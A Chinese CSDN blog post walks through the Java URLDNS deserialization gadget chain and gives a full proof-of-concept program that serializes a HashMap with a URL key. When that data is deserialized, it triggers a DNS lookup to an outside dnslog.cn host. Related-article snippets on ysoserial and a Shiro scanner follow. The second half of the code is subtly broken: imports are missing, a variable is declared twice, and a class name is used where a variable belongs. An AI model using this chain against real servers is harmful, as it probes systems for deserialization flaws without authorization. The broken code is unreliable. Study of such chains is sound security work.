java url dns_java urldns反序列化

最新推荐文章于 2022-11-08 00:49:23 发布
最新推荐文章于 2022-11-08 00:49:23 发布
阅读量115 收藏
点赞数
文章标签: java url dns
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34475062/article/details/114113840
版权

java反序列化urldns

漏洞触发点在hashmap

gadget chain

HashMap.readObject() //首先呼叫hashmap的readobject方法

HashMap.putVal() //在readObject()内执行了putval函数,putval函数内会计算key的hash,会呼叫hash()方法

HashMap.hash() //呼叫hash()方法

URL.hashCode() //在hash方法内呼叫 handler的hashcode()方法,这里调用的是java.net.URL库中的hashcode函数

URLStreamHandler.hashCode() //这里调用的是java.net.URL库中的hashcode函数,当hashcode=-1时会去做dns查询

URLStreamHandler.getHostAddress() //这里调用的是java.net.URL库中的getHostAddress函数

HashMap 为了和保持反序列化后状态的一致性,所以重写了 HashMap.readObject() 方法

在过程中,重新计算 Key 和 Value 的位置,并填充进新的 HashMap 中

import java.io.ByteArrayInputStream;

import java.io.ByteArrayOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.net.URL;

public class Main {

public static void main(String[] args) throws Exception{

HashMap hashMap = new HashMap(); //实例化hashmap

URL url = new URL("http://h1kttt.dnslog.cn"); //将url对象中存入要访问的url

Field f = Class.forName("java.net.URL").getDeclaredField("hashCode"); //利用java反射机制获取url的hashcode

f.setAccessible(true); //设置反射的访问

f.set(url, 12321312); //把hashcode的值设置为随便一个值,避免第一次就直接访问

hashMap.put(url, "zero"); //设置putval的key和value值,key是url,value是zero

//之后在putval内会调用hash函数,而hash函数会调用key的hashcode函数,也就是url的hashcode

f.set(url, -1); //将hashcode的值设置为-1,就会执行hashcode函数去查询url的host地址 #实际测试得知hashcode默认就是-1,这里其实设置不设置-1没什么关系,都会执行查询

/*这里是直接序列化的方法*/

ByteArrayOutputStream baos = new ByteArrayOutputStream(); //实例化一个字节数组输出流

ObjectOutputStream oos = new ObjectOutputStream(baos); //实例化对象输出流,需要提供字节数组输出流对象

oos.writeObject(hashMap); //序列化写入对象

byte[] bytes = baos.toByteArray(); //把缓冲区的内容序列化成字节流

ObjectInputStream objos = new ObjectInputStream(new ByteArrayInputStream(bytes)); //读入序列化字符组

objos.readObject(); //反序列化

/*这里是生成序列化到文件再进行反序列化的方法*/

FileOutputStream fos = new FileOutputStream(new File("urldns.ser"));

ObjectOutputStream oos = new ObjectOutputStream(fos);

oos.writeObject(HashMap);

oos.close();

ObjectInputStream ois = new ObjectInputStream(new FileInputStream("urldns.ser"));

ois.readObject();

}

}

技术巫师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化入门之URLDNS链1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
Java反序列化URLDNS
最新发布
m0_62466350的博客
05-28 738
URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
Java反序列化URLDNS
m0_61572518的博客
04-14 2448
序列化代码: import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class UrlDnsClient { public static void main(String[] args)
java url dns_JAVA反序列化URLDNS链分析
weixin_34093899的博客
02-13 248
前言从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用链,这次先从其中的一个可以说是最简单的利用链URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
通过URLDNS来入门java反序列化
weixin_44502336的博客
10-26 1069
URLDNS链复现
URLDNS反序列化
遇事不决冲冲冲
01-28 4005
URLDNS URLDNS算是一条比较简单的利用链,这条链不依赖第三方库,它无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,主要用这条链来判断服务器是否存在反序列化。接下来就这条链的原理和poc进行分析。 原理分析 首先了解这一下这条链是怎样执行的,代码中最重要的三个类是HashMap,URL,URLStreamHandler。其中HashMap重写了readObject方法,URL类是里面有个hashCode()方法被HashMap的readObject()调用了,URLStreamHa
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化之 ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
URLDNS反序列化链学习.doc
07-09
URLDNS反序列化链学习】文档主要涉及的是Java中的一个安全问题,即URLDNS反序列化链。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
S02-URLDNS反序列化构造链1
08-03
总的来说,`S02-URLDNS反序列化构造链1`是一个利用Java反序列化漏洞的实例,通过精心构造的序列化对象和`SilentURLStreamHandler`,可以在反序列化过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口...
反序列化URLDNS
BaiScorpio的博客
06-13 421
通过 URLDNS学习Java反序列化相关的知识。
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 826
[Java反序列化]—URLDNS链 分析
java url dns_Java反序列化URLDNS链分析
weixin_42504279的博客
02-24 764
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法链子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
Java代码审计:Java反序列化入门之URLDNS
god_Zeo的安全博客
08-19 1256
0x00 前言 自学Java 代码审计,主要自己一个人学习,有点闭门造车,搜索引擎学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 之前研究了,但是没有整理好,因为有hvv任务,所以推迟了一些,现在赶紧整理发出来。 0x01 Java反序列化介绍 Java反序列化漏洞的产生原因: 简单的说就是,在于开发者在重写 readObject 方法的时候,写入了漏洞代码。 序列化和反序列
java url dns_Java安全之URLDNS
weixin_39918084的博客
02-13 158
Java安全之URLDNS链0x00 前言在学习Java反序列化漏洞的时候,就不得不学习他的一个利用链。很多刚刚入门的对于利用链这个词可能比较陌生。那么这里先来了解一下Java反序列化反序列化漏洞的一个产生。0x01 Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久报错了一个对...
java url dns_Yso中的URLDNS分析学习
weixin_34582773的博客
02-16 436
作为 ysoserial 中最简单链,这里简单记录学习一下首先使用ysoserial生成urldns的探测类型首先先去 dnslog.cn 获取一个urljava -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://pk3q64.dnslog.cn" > Test.txt查看生成的文件Java反序列化后的前几个字节就是 ac ed这...
Java反序列化1-URLDNS利用链分析
weixin_43263451的博客
06-26 1136
之前一段时间一直在学习了java,也有刷过一段时间的java靶场。最近想着也应该开始学习java反序列化相关知识了,今天就从java反序列化中最简单的URLDNS链开始分析URLDNS不需要依赖第三方的包,同时不限制jdk的版本URLDNS链并不能执行命令,只能发送DNS请求该链条基本没什么危害,通常做为检测反序列化的入口点使用序列化 反序列化 上面就是java序列化与反序列化一个简单的例子。java的序列化与反序列化所使用的函数时writeObject和readObject,java也允许开发者去自己定义
Java反序列化-URLDNS学习
whojoe的博客
07-06 298
Java反序列化-URLDNS学习前言代码分析ysoserial中的利用方式参考文章 前言 在复现漏洞的时候经常使用dnslog来进行测试,当然有一定的局限性,只能在机器出网的时候才可以使用,并且在一些不知道利用链的情况下 使用urldns的利用链来进行打dnslog效果比较好,因为其没有诸多的限制 文章中如果有错误欢迎各位师傅斧正 代码 这里的代码是直接粘贴天下大木头师傅的,后面做学习分析 import java.io.*; import java.lang.reflect.Field; import j
java反序列化漏洞实战
weixin_34009794的博客
04-01 675
准备: 域名一个,用于增加NS解析,判断是否存在反序列化漏洞。 公网IP服务器一台,用于搭建DNS代理,抓包判断。 dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录。 然后公网IP服务器 开...
java dns 缓存_jvm dns缓存问题解决方式
05-24
Java中,DNS缓存是由Java虚拟机(JVM)维护的。默认情况下,JVM会对DNS信息进行缓存以提高性能。但是,这可能会导致一些问题,例如当DNS服务器上的IP地址更改时,JVM可能仍然会使用旧的地址。 解决这个问题的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值